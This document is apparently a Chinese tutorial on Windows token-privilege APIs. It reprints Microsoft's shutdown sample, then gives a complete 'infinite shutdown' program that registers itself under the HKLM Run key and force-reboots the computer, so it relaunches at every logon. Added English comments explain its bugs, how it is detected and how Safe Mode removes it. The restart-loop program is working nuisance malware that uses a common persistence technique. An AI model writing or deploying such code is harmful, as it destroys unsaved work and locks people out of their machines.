提权三兄弟
OpenProcessToken
LookupPrivilegeValue
AdjustTokenPrivileges
我们用下面这个 MSDN 的代码来做一个注册表无限关机的例子
#include <windows.h>
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "advapi32.lib")

/*
 * MySystemShutdown - MSDN sample: enable SeShutdownPrivilege on the current
 * process token, then force a system shutdown with ExitWindowsEx.
 *
 * Returns TRUE when ExitWindowsEx accepted the request, FALSE when the
 * process token could not be opened, the privilege could not be enabled,
 * or ExitWindowsEx failed.
 *
 * Review notes (defender's view):
 *  - AdjustTokenPrivileges only *enables* a privilege the token already
 *    holds; it cannot grant one. SeShutdownPrivilege is normally held by
 *    interactive users on a workstation, so the "elevation" here is just
 *    switching the privilege on, which token-privilege auditing records.
 *  - EWX_FORCE terminates every application without letting it save, so a
 *    successful call destroys unsaved user work.
 *  - hToken is never released with CloseHandle, so the handle leaks on
 *    every return path.
 */
BOOL MySystemShutdown()
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;

    // Get a token for this process.
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return( FALSE );

    // Get the LUID for the shutdown privilege.
    // NOTE(review): the return value is not checked; if the lookup fails,
    // tkp.Privileges[0].Luid is left indeterminate.
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
                         &tkp.Privileges[0].Luid);

    tkp.PrivilegeCount = 1;  // one privilege to set
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Get the shutdown privilege for this process.
    // Per its documentation AdjustTokenPrivileges can return TRUE even when
    // nothing was assigned, which is why the sample consults GetLastError()
    // (ERROR_NOT_ALL_ASSIGNED) rather than the return value.
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
                          (PTOKEN_PRIVILEGES)NULL, 0);

    if (GetLastError() != ERROR_SUCCESS)
        return FALSE;

    // Shut down the system and force all applications to close.
    if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,
                       SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
                       SHTDN_REASON_MINOR_UPGRADE |
                       SHTDN_REASON_FLAG_PLANNED))
        return FALSE;

    //shutdown was successful
    return TRUE;
}
上面是 MSDN 的代码，下面给出无限关机的代码（含详细解释）
// shutdownDemo.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <windows.h>

/*
 * MySystemShutdown - same flow as the MSDN sample above, except that
 * EWX_REBOOT replaces EWX_SHUTDOWN, so the machine restarts instead of
 * powering off. Together with the Run-key entry written in _tmain this is
 * what turns the demo into a restart loop.
 *
 * Returns TRUE when ExitWindowsEx accepted the request, FALSE otherwise.
 * hToken is never released with CloseHandle (handle leak on every path).
 */
BOOL MySystemShutdown()
{
    HANDLE hToken;          // token handle used for the privilege adjustment
    TOKEN_PRIVILEGES tkp;   // holds the single privilege entry to enable

    // Get a token for this process.
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return(FALSE);

    // Get the LUID for the shutdown privilege.
    // (original note: the privilege is enabled in these two calls)
    // NOTE(review): the return value is not checked.
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
                         &tkp.Privileges[0].Luid);

    tkp.PrivilegeCount = 1;  // one privilege to set
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Get the shutdown privilege for this process.
    // Success is judged by GetLastError(), as in the MSDN sample.
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
                          (PTOKEN_PRIVILEGES)NULL, 0);

    if (GetLastError() != ERROR_SUCCESS)
        return FALSE;

    // Shut down the system and force all applications to close.
    // EWX_FORCE discards unsaved work in every running application.
    if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,
                       SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
                       SHTDN_REASON_MINOR_UPGRADE |
                       SHTDN_REASON_FLAG_PLANNED))
        return FALSE;

    //shutdown was successful
    return TRUE;
}

/*
 * _tmain - waits for a key press, registers this executable under the
 * HKLM ...\CurrentVersion\Run key so it starts again at every logon, then
 * reboots via MySystemShutdown.
 *
 * Review notes (defender's view):
 *  - Writing HKEY_LOCAL_MACHINE\...\Run requires administrative rights. The
 *    RegOpenKeyExA result is never checked, so on a standard-user token hKey
 *    stays 0 and RegSetValueEx is called with an invalid handle.
 *  - An autorun value written under this key is a classic persistence
 *    indicator; registry auditing and autorun monitoring cover it, and the
 *    loop is broken by deleting the "ShutDown" value from the Run key (for
 *    example from Safe Mode, where Run entries are not processed).
 *  - RegSetValueEx carries no A/W suffix, so in a Unicode build it resolves
 *    to RegSetValueExW while "ShutDown" and path are narrow strings; this is
 *    the character-set mismatch the page tells the reader to fix in the
 *    project settings.
 *  - hKey is never released with RegCloseKey.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    getchar();              // pause so the demo can be observed before it acts
    HKEY hKey = { 0 };
    /*LONG RegOpenKeyEx(
        HKEY hKey,           // handle of the root key to open
        LPCTSTR lpSubKey,    // name of the subkey to open
        DWORD ulOptions,     // reserved, set to 0
        REGSAM samDesired,   // security access mask, i.e. the requested rights
        PHKEY phkResult      // receives the handle of the opened key
    )*/
    RegOpenKeyExA(HKEY_LOCAL_MACHINE,
                  "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                  0, KEY_WRITE, &hKey);   // open the specified registry key
    char path[MAX_PATH] = { 0 };
    GetModuleFileNameA(nullptr, path, MAX_PATH);   // get the current executable's path
    RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path));
    MySystemShutdown();
    return 0;
}
如果出现下面的问题
请按如下方式修改字符集
下面看看运行效果！